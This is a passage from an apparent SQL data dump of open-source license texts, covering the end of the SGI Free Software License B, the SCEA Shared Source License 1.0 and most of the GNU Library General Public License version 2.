individual or a legal entity exercising rights under,\nand complying with all of the terms of, this License or a future version of\nthis License issued under Section 8. For legal entities, \"Recipient\" includes\nany entity that controls, is controlled by, or is under common control with\nRecipient. For purposes of this definition, \"control\" of an entity means (a)\nthe power, direct or indirect, to direct or manage such entity, or (b) ownership\nof fifty percent (50%) or more of the outstanding shares or beneficial ownership\nof such entity.\n\n1.12 \"Recipient Patents\" means patent claims Licensable by a Recipient that\nare infringed by the use or sale of Original Code or any Modifications provided\nby SGI, or any combination thereof.\n\n 1.13 \"SGI\" means Silicon Graphics, Inc.\n\n1.14 \"SGI Patents\" means patent claims Licensable by SGI other than the Licensed\nPatents.\n\n 2. License Grant and Restrictions.\n\n2.1 SGI License Grant. Subject to the terms of this License and any third\nparty intellectual property claims, for the duration of intellectual property\nprotections inherent in the Original Code, SGI hereby grants Recipient a worldwide,\nroyalty-free, non-exclusive license, to do the following: (i) under copyrights\nLicensable by SGI, to reproduce, distribute, create derivative works from,\nand, to the extent applicable, display and perform the Original Code and/or\nany Modifications provided by SGI alone and/or as part of a Larger Work; and\n(ii) under any Licensable Patents, to make, have made, use, sell, offer for\nsale, import and/or otherwise transfer the Original Code and/or any Modifications\nprovided by SGI. Recipient accepts the terms and conditions of this License\nby undertaking any of the aforementioned actions. The patent license shall\napply to the Covered Code if, at the time any related Modification is added,\nsuch addition of the Modification causes such combination to be covered by\nthe Licensed Patents. The patent license in Section 2.1(ii) shall not apply\nto any other combinations that include the Modification. No patent license\nis provided under SGI Patents for infringements of SGI Patents by Modifications\nnot provided by SGI or combinations of Original Code and Modifications not\nprovided by SGI.\n\n2.2 Recipient License Grant. Subject to the terms of this License and any\nthird party intellectual property claims, Recipient hereby grants SGI and\nany other Recipients a worldwide, royalty-free, non-exclusive license, under\nany Recipient Patents, to make, have made, use, sell, offer for sale, import\nand/or otherwise transfer the Original Code and/or any Modifications provided\nby SGI.\n\n2.3 No License For Hardware Implementations. The licenses granted in Section\n2.1 and 2.2 are not applicable to implementation in Hardware of the algorithms\nembodied in the Original Code or any Modifications provided by SGI .\n\n 3. Redistributions.\n\n3.1 Retention of Notice/Copy of License. The Notice set forth in Exhibit A,\nbelow, must be conspicuously retained or included in any and all redistributions\nof Covered Code. For distributions of the Covered Code in source code form,\nthe Notice must appear in every file that can include a text comments field;\nin executable form, the Notice and a copy of this License must appear in related\ndocumentation or collateral where the Recipient\'s rights relating to Covered\nCode are described. Any Additional Notice Provisions which actually appears\nin the Original Code must also be retained or included in any and all redistributions\nof Covered Code.\n\n3.2 Alternative License. Provided that Recipient is in compliance with the\nterms of this License, Recipient may, so long as without derogation of any\nof SGI\'s rights in and to the Original Code, distribute the source code and/or\nexecutable version(s) of Covered Code under (1) this License; (2) a license\nidentical to this License but for only such changes as are necessary in order\nto clarify Recipient\'s role as licensor of Modifications; and/or (3) a license\nof Recipient\'s choosing, containing terms different from this License, provided\nthat the license terms include this Section 3 and Sections 4, 6, 7, 10, 12,\nand 13, which terms may not be modified or superseded by any other terms of\nsuch license. If Recipient elects to use any license other than this License,\nRecipient must make it absolutely clear that any of its terms which differ\nfrom this License are offered by Recipient alone, and not by SGI. It is emphasized\nthat this License is a limited license, and, regardless of the license form\nemployed by Recipient in accordance with this Section 3.2, Recipient may relicense\nonly such rights, in Original Code and Modifications by SGI, as it has actually\nbeen granted by SGI in this License.\n\n3.3 Indemnity. Recipient hereby agrees to indemnify SGI for any liability\nincurred by SGI as a result of any such alternative license terms Recipient\noffers.\n\n4. Termination. This License and the rights granted hereunder will terminate\nautomatically if Recipient breaches any term herein and fails to cure such\nbreach within 30 days thereof. Any sublicense to the Covered Code that is\nproperly granted shall survive any termination of this License, absent termination\nby the terms of such sublicense. Provisions that, by their nature, must remain\nin effect beyond the termination of this License, shall survive.\n\n5. No Trademark Or Other Rights. This License does not grant any rights to:\n(i) any software apart from the Covered Code, nor shall any other rights or\nlicenses not expressly granted hereunder arise by implication, estoppel or\notherwise with respect to the Covered Code; (ii) any trade name, trademark\nor service mark whatsoever, including without limitation any related right\nfor purposes of endorsement or promotion of products derived from the Covered\nCode, without prior written permission of SGI; or (iii) any title to or ownership\nof the Original Code, which shall at all times remains with SGI. All rights\nin the Original Code not expressly granted under this License are reserved.\n\n6. Compliance with Laws; Non-Infringement. There are various worldwide laws,\nregulations, and executive orders applicable to dispositions of Covered Code,\nincluding without limitation export, re-export, and import control laws, regulations,\nand executive orders, of the U.S. government and other countries, and Recipient\nis reminded it is obliged to obey such laws, regulations, and executive orders.\nRecipient may not distribute Covered Code that (i) in any way infringes (directly\nor contributorily) any intellectual property rights of any kind of any other\nperson or entity or (ii) breaches any representation or warranty, express,\nimplied or statutory, to which, under any applicable law, it might be deemed\nto have been subject.\n\n7. Claims of Infringement. If Recipient learns of any third party claim that\nany disposition of Covered Code and/or functionality wholly or partially infringes\nthe third party\'s intellectual property rights, Recipient will promptly notify\nSGI of such claim.\n\n8. Versions of the License. SGI may publish revised and/or new versions of\nthe License from time to time, each with a distinguishing version number.\nOnce Covered Code has been published under a particular version of the License,\nRecipient may, for the duration of the license, continue to use it under the\nterms of that version, or choose to use such Covered Code under the terms\nof any subsequent version published by SGI. Subject to the provisions of Sections\n3 and 4 of this License, only SGI may modify the terms applicable to Covered\nCode created under this License.\n\n9. DISCLAIMER OF WARRANTY. COVERED CODE IS PROVIDED \"AS IS.\" ALL EXPRESS AND\nIMPLIED WARRANTIES AND CONDITIONS ARE DISCLAIMED, INCLUDING, WITHOUT LIMITATION,\nANY IMPLIED WARRANTIES AND CONDITIONS OF MERCHANTABILITY, SATISFACTORY QUALITY,\nFITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. SGI ASSUMES NO RISK\nAS TO THE QUALITY AND PERFORMANCE OF THE SOFTWARE. SHOULD THE SOFTWARE PROVE\nDEFECTIVE IN ANY RESPECT, SGI ASSUMES NO COST OR LIABILITY FOR SERVICING,\nREPAIR OR CORRECTION. THIS DISCLAIMER OF WARRANTY IS AN ESSENTIAL PART OF\nTHIS LICENSE. NO USE OF ANY COVERED CODE IS AUTHORIZED HEREUNDER EXCEPT SUBJECT\nTO THIS DISCLAIMER.\n\n10. LIMITATION OF LIABILITY. UNDER NO CIRCUMSTANCES NOR LEGAL THEORY, WHETHER\nTORT (INCLUDING, WITHOUT LIMITATION, NEGLIGENCE OR STRICT LIABILITY), CONTRACT,\nOR OTHERWISE, SHALL SGI OR ANY SGI LICENSOR BE LIABLE FOR ANY DIRECT, INDIRECT,\nSPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING,\nWITHOUT LIMITATION, DAMAGES FOR LOSS OF GOODWILL, WORK STOPPAGE, LOSS OF DATA,\nCOMPUTER FAILURE OR MALFUNCTION, OR ANY AND ALL OTHER COMMERCIAL DAMAGES OR\nLOSSES, EVEN IF SUCH PARTY SHALL HAVE BEEN INFORMED OF THE POSSIBILITY OF\nSUCH DAMAGES. THIS LIMITATION OF LIABILITY SHALL NOT APPLY TO LIABILITY FOR\nDEATH OR PERSONAL INJURY RESULTING FROM SGI\'s NEGLIGENCE TO THE EXTENT APPLICABLE\nLAW PROHIBITS SUCH LIMITATION. SOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION\nOR LIMITATION OF INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THAT EXCLUSION AND\nLIMITATION MAY NOT APPLY TO RECIPIENT.\n\n11. Indemnity. Recipient shall be solely responsible for damages arising,\ndirectly or indirectly, out of its utilization of rights under this License.\nRecipient will defend, indemnify and hold harmless Silicon Graphics, Inc.\nfrom and against any loss, liability, damages, costs or expenses (including\nthe payment of reasonable attorneys fees) arising out of Recipient\'s use,\nmodification, reproduction and distribution of the Covered Code or out of\nany representation or warranty made by Recipient.\n\n12. U.S. Government End Users. The Covered Code is a \"commercial item\" consisting\nof \"commercial computer software\" as such terms are defined in title 48 of\nthe Code of Federal Regulations and all U.S. Government End Users acquire\nonly the rights set forth in this License and are subject to the terms of\nthis License.\n\n13. Miscellaneous. This License represents the complete agreement concerning\nthe its subject matter. If any provision of this License is held to be unenforceable,\nsuch provision shall be reformed so as to achieve as nearly as possible the\nsame legal and economic effect as the original provision and the remainder\nof this License will remain in effect. This License shall be governed by and\nconstrued in accordance with the laws of the United States and the State of\nCalifornia as applied to agreements entered into and to be performed entirely\nwithin California between California residents. Any litigation relating to\nthis License shall be subject to the exclusive jurisdiction of the Federal\nCourts of the Northern District of California (or, absent subject matter jurisdiction\nin such courts, the courts of the State of California), with venue lying exclusively\nin Santa Clara County, California, with the losing party responsible for costs,\nincluding without limitation, court costs and reasonable attorneys fees and\nexpenses. The application of the United Nations Convention on Contracts for\nthe International Sale of Goods is expressly excluded. Any law or regulation\nthat provides that the language of a contract shall be construed against the\ndrafter shall not apply to this License. Exhibit A\n\nLicense Applicability. Except to the extent portions of this file are made\nsubject to an alternative license as permitted in the SGI Free Software License\nB, Version 1.1 (the \"License\"), the contents of this file are subject only\nto the provisions of the License. You may not use this file except in compliance\nwith the License. You may obtain a copy of the License at Silicon Graphics,\nInc., attn: Legal Services, 1600 Amphitheatre Parkway, Mountain View, CA 94043-1351,\nor at:\n\nhttp://oss.sgi.com/projects/FreeB\n\nNote that, as provided in the License, the Software is distributed on an \"AS\nIS\" basis, with ALL EXPRESS AND IMPLIED WARRANTIES AND CONDITIONS DISCLAIMED,\nINCLUDING, WITHOUT LIMITATION, ANY IMPLIED WARRANTIES AND CONDITIONS OF MERCHANTABILITY,\nSATISFACTORY QUALITY, FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT.\n\nOriginal Code. The Original Code is: [ name of software , version number ,\nand release date ] , developed by Silicon Graphics, Inc. The Original Code\nis Copyright (c) [ dates of first publication, as appearing in the Notice\nin the Original Code ] Silicon Graphics, Inc. Copyright in any portions created\nby third parties is as indicated elsewhere herein. All Rights Reserved. Additional\nNotice Provisions: [ such additional provisions, if any, as appear in the\nNotice in the Original Code under the heading \"Additional Notice Provisions\"\n]\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(112,'SCEA','SCEA Shared Source License 1.0\n\nTerms and Conditions:\n\n 1. Definitions:\n\n\"Software\" shall mean the software and related documentation, whether in Source\nor Object Form, made available under this SCEA Shared Source license (\"License\"),\nthat is indicated by a copyright notice file included in the source files\nor attached or accompanying the source files.\n\n\"Licensor\" shall mean Sony Computer Entertainment America, Inc. (herein \"SCEA\")\n\n\"Object Code\" or \"Object Form\" shall mean any form that results from translation\nor transformation of Source Code, including but not limited to compiled object\ncode or conversions to other forms intended for machine execution.\n\n\"Source Code\" or \"Source Form\" shall have the plain meaning generally accepted\nin the software industry, including but not limited to software source code,\ndocumentation source, header and configuration files.\n\n\"You\" or \"Your\" shall mean you as an individual or as a company, or whichever\nform under which you are exercising rights under this License.\n\n 2. License Grant.\n\nLicensor hereby grants to You, free of charge subject to the terms and conditions\nof this License, an irrevocable, non-exclusive, worldwide, perpetual, and\nroyalty-free license to use, modify, reproduce, distribute, publicly perform\nor display the Software in Object or Source Form .\n\n 3. No Right to File for Patent.\n\nIn exchange for the rights that are granted to You free of charge under this\nLicense, You agree that You will not file for any patent application, seek\ncopyright protection or take any other action that might otherwise impair\nthe ownership rights in and to the Software that may belong to SCEA or any\nof the other contributors/authors of the Software.\n\n 4. Contributions.\n\nSCEA welcomes contributions in form of modifications, optimizations, tools\nor documentation designed to improve or expand the performance and scope of\nthe Software (collectively \"Contributions\"). Per the terms of this License\nYou are free to modify the Software and those modifications would belong to\nYou. You may however wish to donate Your Contributions to SCEA for consideration\nfor inclusion into the Software. For the avoidance of doubt, if You elect\nto send Your Contributions to SCEA, You are doing so voluntarily and are giving\nthe Contributions to SCEA and its parent company Sony Computer Entertainment,\nInc., free of charge, to use, modify or distribute in any form or in any manner.\nSCEA acknowledges that if You make a donation of Your Contributions to SCEA,\nsuch Contributions shall not exclusively belong to SCEA or its parent company\nand such donation shall not be to Your exclusion. SCEA, in its sole discretion,\nshall determine whether or not to include Your donated Contributions into\nthe Software, in whole, in part, or as modified by SCEA. Should SCEA elect\nto include any such Contributions into the Software, it shall do so at its\nown risk and may elect to give credit or special thanks to any such contributors\nin the attached copyright notice. However, if any of Your contributions are\nincluded into the Software, they will become part of the Software and will\nbe distributed under the terms and conditions of this License. Further, if\nYour donated Contributions are integrated into the Software then Sony Computer\nEntertainment, Inc. shall become the copyright owner of the Software now containing\nYour contributions and SCEA would be the Licensor.\n\n 5. Redistribution in Source Form\n\nYou may redistribute copies of the Software, modifications or derivatives\nthereof in Source Code Form, provided that You:\n\n a. Include a copy of this License and any copyright notices with source\n\n b. Identify modifications if any were made to the Software\n\nc. Include a copy of all documentation accompanying the Software and modifications\nmade by You\n\n 6. Redistribution in Object Form\n\nIf You redistribute copies of the Software, modifications or derivatives thereof\nin Object Form only (as incorporated into finished goods, i.e. end user applications)\nthen You will not have a duty to include any copies of the code, this License,\ncopyright notices, other attributions or documentation.\n\n 7. No Warranty\n\nTHE SOFTWARE IS PROVIDED ON AN \"AS IS\" BASIS, WITHOUT ANY REPRESENTATIONS\nOR WARRANTIES OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING, WITHOUT LIMITATION,\nANY WARRANTIES OF TITLE, NON-INFRINGEMENT, MERCHANTABILITY, OR FITNESS FOR\nA PARTICULAR PURPOSE. YOU ARE SOLELY RESPONSIBLE FOR DETERMINING THE APPROPRIATENESS\nOF USING, MODIFYING OR REDISTRIBUTING THE SOFTWARE AND ASSUME ANY RISKS ASSOCIATED\nWITH YOUR EXERCISE OF PERMISSIONS UNDER THIS LICENSE.\n\n 8. Limitation of Liability\n\nUNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY WILL EITHER PARTY BE LIABLE\nTO THE OTHER PARTY OR ANY THIRD PARTY FOR ANY DIRECT, INDIRECT, CONSEQUENTIAL,\nSPECIAL, INCIDENTAL, OR EXEMPLARY DAMAGES WITH RESPECT TO ANY INJURY, LOSS,\nOR DAMAGE, ARISING UNDER OR IN CONNECTION WITH THIS LETTER AGREEMENT, WHETHER\nFORESEEABLE OR UNFORESEEABLE, EVEN IF SUCH PARTY HAS BEEN ADVISED OF THE POSSIBILITY\nOF SUCH INJURY, LOSS, OR DAMAGE. THE LIMITATIONS OF LIABILITY SET FORTH IN\nTHIS SECTION SHALL APPLY TO THE FULLEST EXTENT PERMISSIBLE AT LAW OR ANY GOVERMENTAL\nREGULATIONS.\n\n 9. Governing Law and Consent to Jurisdiction\n\nThis Agreement shall be governed by and interpreted in accordance with the\nlaws of the State of California, excluding that body of law related to choice\nof laws, and of the United States of America. Any action or proceeding brought\nto enforce the terms of this Agreement or to adjudicate any dispute arising\nhereunder shall be brought in the Superior Court of the County of San Mateo,\nState of California or the United States District Court for the Northern District\nof California. Each of the parties hereby submits itself to the exclusive\njurisdiction and venue of such courts for purposes of any such action. In\naddition, each party hereby waives the right to a jury trial in any action\nor proceeding related to this Agreement.\n\n 10. Copyright Notice for Redistribution of Source Code\n\nCopyright 2005 Sony Computer Entertainment Inc.\n\nLicensed under the SCEA Shared Source License, Version 1.0 (the \"License\");\nyou may not use this file except in compliance with the License. You may obtain\na copy of the License at:\n\nhttp://research.scea.com/scea_shared_source_license.html\n\nUnless required by applicable law or agreed to in writing, software distributed\nunder the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR\nCONDITIONS OF ANY KIND, either express or implied. See the License for the\nspecific language governing permissions and limitations under the License.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(113,'LGPL-2.0-or-later','GNU LIBRARY GENERAL PUBLIC LICENSE\n\nVersion 2, June 1991\n\nCopyright (C) 1991 Free Software Foundation, Inc.\n\n51 Franklin St, Fifth Floor, Boston, MA 02110-1301, USA\n\nEveryone is permitted to copy and distribute verbatim copies of this license\ndocument, but changing it is not allowed.\n\n[This is the first released version of the library GPL. It is numbered 2 because\nit goes with version 2 of the ordinary GPL.]\n\nPreamble\n\nThe licenses for most software are designed to take away your freedom to share\nand change it. By contrast, the GNU General Public Licenses are intended to\nguarantee your freedom to share and change free software--to make sure the\nsoftware is free for all its users.\n\nThis license, the Library General Public License, applies to some specially\ndesignated Free Software Foundation software, and to any other libraries whose\nauthors decide to use it. You can use it for your libraries, too.\n\nWhen we speak of free software, we are referring to freedom, not price. Our\nGeneral Public Licenses are designed to make sure that you have the freedom\nto distribute copies of free software (and charge for this service if you\nwish), that you receive source code or can get it if you want it, that you\ncan change the software or use pieces of it in new free programs; and that\nyou know you can do these things.\n\nTo protect your rights, we need to make restrictions that forbid anyone to\ndeny you these rights or to ask you to surrender the rights. These restrictions\ntranslate to certain responsibilities for you if you distribute copies of\nthe library, or if you modify it.\n\nFor example, if you distribute copies of the library, whether gratis or for\na fee, you must give the recipients all the rights that we gave you. You must\nmake sure that they, too, receive or can get the source code. If you link\na program with the library, you must provide complete object files to the\nrecipients so that they can relink them with the library, after making changes\nto the library and recompiling it. And you must show them these terms so they\nknow their rights.\n\nOur method of protecting your rights has two steps: (1) copyright the library,\nand (2) offer you this license which gives you legal permission to copy, distribute\nand/or modify the library.\n\nAlso, for each distributor\'s protection, we want to make certain that everyone\nunderstands that there is no warranty for this free library. If the library\nis modified by someone else and passed on, we want its recipients to know\nthat what they have is not the original version, so that any problems introduced\nby others will not reflect on the original authors\' reputations.\n\nFinally, any free program is threatened constantly by software patents. We\nwish to avoid the danger that companies distributing free software will individually\nobtain patent licenses, thus in effect transforming the program into proprietary\nsoftware. To prevent this, we have made it clear that any patent must be licensed\nfor everyone\'s free use or not licensed at all.\n\nMost GNU software, including some libraries, is covered by the ordinary GNU\nGeneral Public License, which was designed for utility programs. This license,\nthe GNU Library General Public License, applies to certain designated libraries.\nThis license is quite different from the ordinary one; be sure to read it\nin full, and don\'t assume that anything in it is the same as in the ordinary\nlicense.\n\nThe reason we have a separate public license for some libraries is that they\nblur the distinction we usually make between modifying or adding to a program\nand simply using it. Linking a program with a library, without changing the\nlibrary, is in some sense simply using the library, and is analogous to running\na utility program or application program. However, in a textual and legal\nsense, the linked executable is a combined work, a derivative of the original\nlibrary, and the ordinary General Public License treats it as such.\n\nBecause of this blurred distinction, using the ordinary General Public License\nfor libraries did not effectively promote software sharing, because most developers\ndid not use the libraries. We concluded that weaker conditions might promote\nsharing better.\n\nHowever, unrestricted linking of non-free programs would deprive the users\nof those programs of all benefit from the free status of the libraries themselves.\nThis Library General Public License is intended to permit developers of non-free\nprograms to use free libraries, while preserving your freedom as a user of\nsuch programs to change the free libraries that are incorporated in them.\n(We have not seen how to achieve this as regards changes in header files,\nbut we have achieved it as regards changes in the actual functions of the\nLibrary.) The hope is that this will lead to faster development of free libraries.\n\nThe precise terms and conditions for copying, distribution and modification\nfollow. Pay close attention to the difference between a \"work based on the\nlibrary\" and a \"work that uses the library\". The former contains code derived\nfrom the library, while the latter only works together with the library.\n\nNote that it is possible for a library to be covered by the ordinary General\nPublic License rather than by this special one.\n\nTERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION\n\n0. This License Agreement applies to any software library which contains a\nnotice placed by the copyright holder or other authorized party saying it\nmay be distributed under the terms of this Library General Public License\n(also called \"this License\"). Each licensee is addressed as \"you\".\n\nA \"library\" means a collection of software functions and/or data prepared\nso as to be conveniently linked with application programs (which use some\nof those functions and data) to form executables.\n\nThe \"Library\", below, refers to any such software library or work which has\nbeen distributed under these terms. A \"work based on the Library\" means either\nthe Library or any derivative work under copyright law: that is to say, a\nwork containing the Library or a portion of it, either verbatim or with modifications\nand/or translated straightforwardly into another language. (Hereinafter, translation\nis included without limitation in the term \"modification\".)\n\n\"Source code\" for a work means the preferred form of the work for making modifications\nto it. For a library, complete source code means all the source code for all\nmodules it contains, plus any associated interface definition files, plus\nthe scripts used to control compilation and installation of the library.\n\nActivities other than copying, distribution and modification are not covered\nby this License; they are outside its scope. The act of running a program\nusing the Library is not restricted, and output from such a program is covered\nonly if its contents constitute a work based on the Library (independent of\nthe use of the Library in a tool for writing it). Whether that is true depends\non what the Library does and what the program that uses the Library does.\n\n1. You may copy and distribute verbatim copies of the Library\'s complete source\ncode as you receive it, in any medium, provided that you conspicuously and\nappropriately publish on each copy an appropriate copyright notice and disclaimer\nof warranty; keep intact all the notices that refer to this License and to\nthe absence of any warranty; and distribute a copy of this License along with\nthe Library.\n\nYou may charge a fee for the physical act of transferring a copy, and you\nmay at your option offer warranty protection in exchange for a fee.\n\n2. You may modify your copy or copies of the Library or any portion of it,\nthus forming a work based on the Library, and copy and distribute such modifications\nor work under the terms of Section 1 above, provided that you also meet all\nof these conditions:\n\n a) The modified work must itself be a software library.\n\nb) You must cause the files modified to carry prominent notices stating that\nyou changed the files and the date of any change.\n\nc) You must cause the whole of the work to be licensed at no charge to all\nthird parties under the terms of this License.\n\nd) If a facility in the modified Library refers to a function or a table of\ndata to be supplied by an application program that uses the facility, other\nthan as an argument passed when the facility is invoked, then you must make\na good faith effort to ensure that, in the event an application does not supply\nsuch function or table, the facility still operates, and performs whatever\npart of its purpose remains meaningful.\n\n(For example, a function in a library to compute square roots has a purpose\nthat is entirely well-defined independent of the application. Therefore, Subsection\n2d requires that any application-supplied function or table used by this function\nmust be optional: if the application does not supply it, the square root function\nmust still compute square roots.)\n\nThese requirements apply to the modified work as a whole. If identifiable\nsections of that work are not derived from the Library, and can be reasonably\nconsidered independent and separate works in themselves, then this License,\nand its terms, do not apply to those sections when you distribute them as\nseparate works. But when you distribute the same sections as part of a whole\nwhich is a work based on the Library, the distribution of the whole must be\non the terms of this License, whose permissions for other licensees extend\nto the entire whole, and thus to each and every part regardless of who wrote\nit.\n\nThus, it is not the intent of this section to claim rights or contest your\nrights to work written entirely by you; rather, the intent is to exercise\nthe right to control the distribution of derivative or collective works based\non the Library.\n\nIn addition, mere aggregation of another work not based on the Library with\nthe Library (or with a work based on the Library) on a volume of a storage\nor distribution medium does not bring the other work under the scope of this\nLicense.\n\n3. You may opt to apply the terms of the ordinary GNU General Public License\ninstead of this License to a given copy of the Library. To do this, you must\nalter all the notices that refer to this License, so that they refer to the\nordinary GNU General Public License, version 2, instead of to this License.\n(If a newer version than version 2 of the ordinary GNU General Public License\nhas appeared, then you can specify that version instead if you wish.) Do not\nmake any other change in these notices.\n\nOnce this change is made in a given copy, it is irreversible for that copy,\nso the ordinary GNU General Public License applies to all subsequent copies\nand derivative works made from that copy.\n\nThis option is useful when you wish to copy part of the code of the Library\ninto a program that is not a library.\n\n4. You may copy and distribute the Library (or a portion or derivative of\nit, under Section 2) in object code or executable form under the terms of\nSections 1 and 2 above provided that you accompany it with the complete corresponding\nmachine-readable source code, which must be distributed under the terms of\nSections 1 and 2 above on a medium customarily used for software interchange.\n\nIf distribution of object code is made by offering access to copy from a designated\nplace, then offering equivalent access to copy the source code from the same\nplace satisfies the requirement to distribute the source code, even though\nthird parties are not compelled to copy the source along with the object code.\n\n5. A program that contains no derivative of any portion of the Library, but\nis designed to work with the Library by being compiled or linked with it,\nis called a \"work that uses the Library\". Such a work, in isolation, is not\na derivative work of the Library, and therefore falls outside the scope of\nthis License.\n\nHowever, linking a \"work that uses the Library\" with the Library creates an\nexecutable that is a derivative of the Library (because it contains portions\nof the Library), rather than a \"work that uses the library\". The executable\nis therefore covered by this License. Section 6 states terms for distribution\nof such executables.\n\nWhen a \"work that uses the Library\" uses material from a header file that\nis part of the Library, the object code for the work may be a derivative work\nof the Library even though the source code is not. Whether this is true is\nespecially significant if the work can be linked without the Library, or if\nthe work is itself a library. The threshold for this to be true is not precisely\ndefined by law.\n\nIf such an object file uses only numerical parameters, data structure layouts\nand accessors, and small macros and small inline functions (ten lines or less\nin length), then the use of the object file is unrestricted, regardless of\nwhether it is legally a derivative work. (Executables containing this object\ncode plus portions of the Library will still fall under Section 6.)\n\nOtherwise, if the work is a derivative of the Library, you may distribute\nthe object code for the work under the terms of Section 6. Any executables\ncontaining that work also fall under Section 6, whether or not they are linked\ndirectly with the Library itself.\n\n6. As an exception to the Sections above, you may also compile or link a \"work\nthat uses the Library\" with the Library to produce a work containing portions\nof the Library, and distribute that work under terms of your choice, provided\nthat the terms permit modification of the work for the customer\'s own use\nand reverse engineering for debugging such modifications.\n\nYou must give prominent notice with each copy of the work that the Library\nis used in it and that the Library and its use are covered by this License.\nYou must supply a copy of this License. If the work during execution displays\ncopyright notices, you must include the copyright notice for the Library among\nthem, as well as a reference directing the user to the copy of this License.\nAlso, you must do one of these things:\n\na) Accompany the work with the complete corresponding machine-readable source\ncode for the Library including whatever changes were used in the work (which\nmust be distributed under Sections 1 and 2 above); and, if the work is an\nexecutable linked with the Library, with the complete machine-readable \"work\nthat uses the Library\", as object code and/or source code, so that the user\ncan modify the Library and then relink to produce a modified executable containing\nthe modified Library. (It is understood that the user who changes the contents\nof definitions files in the Library will not necessarily be able to recompile\nthe application to use the modified definitions.)\n\nb) Accompany the work with a written offer, valid for at least three years,\nto give the same user the materials specified in Subsection 6a, above, for\na charge no more than the cost of performing this distribution.\n\nc) If distribution of the work is made by offering access to copy from a designated\nplace, offer equivalent access to copy the above specified materials from\nthe same place.\n\nd) Verify that the user has already received a copy of these materials or\nthat you have already sent this user a copy.\n\nFor an executable, the required form of the \"work that uses the Library\" must\ninclude any data and utility programs needed for reproducing the executable\nfrom it. However, as a special exception, the source code distributed need\nnot include anything that is normally distributed (in either source or binary\nform) with the major components (compiler, kernel, and so on) of the operating\nsystem on which the executable runs, unless that component itself accompanies\nthe executable.\n\nIt may happen that this requirement contradicts the license restrictions of\nother proprietary libraries that do not normally accompany the operating system.\nSuch a contradiction means you cannot use both them and the Library together\nin an executable that you distribute.\n\n7. You may place library facilities that are a work based on the Library side-by-side\nin a single library together with other library facilities not covered by\nthis License, and distribute such a combined library, provided that the separate\ndistribution of the work based on the Library and of the other library facilities\nis otherwise permitted, and provided that you do these two things:\n\na) Accompany the combined library with a copy of the same work based on the\nLibrary, uncombined with any other library facilities. This must be distributed\nunder the terms of the Sections above.\n\nb) Give prominent notice with the combined library of the fact that part of\nit is a work based on the Library, and explaining where to find the accompanying\nuncombined form of the same work.\n\n8. You may not copy, modify, sublicense, link with, or distribute the Library\nexcept as expressly provided under this License. Any attempt otherwise to\ncopy, modify, sublicense, link with, or distribute the Library is void, and\nwill automatically terminate your rights under this License. However, parties\nwho have received copies, or rights, from you under this License will not\nhave their licenses terminated so long as such parties remain in full compliance.\n\n9. You are not required to accept this License, since you have not signed\nit. However, nothing else grants you permission to modify or distribute the\nLibrary or its derivative works. These actions are prohibited by law if you\ndo not accept this License. Therefore, by modifying or distributing the Library\n(or any work based on the Library), you indicate your acceptance of this License\nto do so, and all its terms and conditions for copying, distributing or modifying\nthe Library or works based on it.\n\n10. Each time you redistribute the Library (or any work based on the Library),\nthe recipient automatically receives a license from the original licensor\nto copy, distribute, link with or modify the Library subject to these terms\nand conditions. You may not impose any further restrictions on the recipients\'\nexercise of the rights granted herein. You are not responsible for enforcing\ncompliance by third parties to this License.\n\n11. If, as a consequence of a court judgment or allegation of patent infringement\nor for any other reason (not limited to patent issues), conditions are imposed\non you (whether by court order, agreement or otherwise) that contradict the\nconditions of this License, they do not excuse you from the conditions of\nthis License. If you cannot distribute so as to satisfy simultaneously your\nobligations under this License and any other pertinent obligations, then as\na consequence you may not distribute the Library at all. For example, if a\npatent license would not permit royalty-free redistribution of the Library\nby all those who receive copies directly or indirectly through you, then the\nonly way you could satisfy both it and this License would be to refrain entirely\nfrom distribution of the Library.\n\nIf any portion of this section is held invalid or unenforceable under any\nparticular circumstance, the balance of the section is intended to apply,\nand the section as a whole is intended to apply in other circumstances.\n\nIt is not the purpose of this section to induce you to infringe any patents\nor other property right claims or to contest validity of any such claims;\nthis section has the sole purpose of protecting the integrity of the free\nsoftware distribution system which is implemented by public license practices.\nMany people have made generous contributions to the wide range of software\ndistributed through that system in reliance on consistent application of that\nsystem; it is up to the author/donor to decide if he or she is willing to\ndistribute software through any other system and a licensee cannot impose\nthat choice.\n\nThis section is intended to make thoroughly clear what is believed to be a\nconsequence of the rest of this License.\n\n12. If the distribution and/or use of the Library is restricted in certain\ncountries either by patents or by copyrighted interfaces, the original copyright\nholder who places the Library under this License may add an explicit geographical\ndistribution limitation excluding those countries, so that distribution is\npermitted only in or among countries not thus excluded. In such case, this\nLicense incorporates the limitation as if written in the body of this License.\n\n13. The Free Software Foundation may publish revised and/or new versions of\nthe Library General Public License from time to time. Such new versions will\nbe similar in spirit to the present version, but may differ in detail to address\nnew problems or concerns.\n\nEach version is given a distinguishing version number. If the Library specifies\na version number of this License which applies to it and \"any later version\",\nyou have the option of following the terms and conditions either of that version\nor of any later version published by the Free Software Foundation. If the\nLibrary does not specify a license version number, you may choose any version\never published by the Free Software Foundation.\n\n14. If you wish to incorporate parts of the Library into other free programs\nwhose distribution conditions are incompatible with these, write to the author\nto ask for permission. For software which is copyrighted by the Free Software\nFoundation, write to the Free Software Foundation; we sometimes make exceptions\nfor this. Our decision will be guided by the two goals of preserving the free\nstatus of all derivatives of our free software and of promoting the sharing\nand reuse of software generally.\n\n NO WARRANTY\n\n15. BECAUSE THE LIBRARY IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR\nTHE LIBRARY, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE\nSTATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE LIBRARY\n\"AS IS\" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING,\nBUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\nFOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE 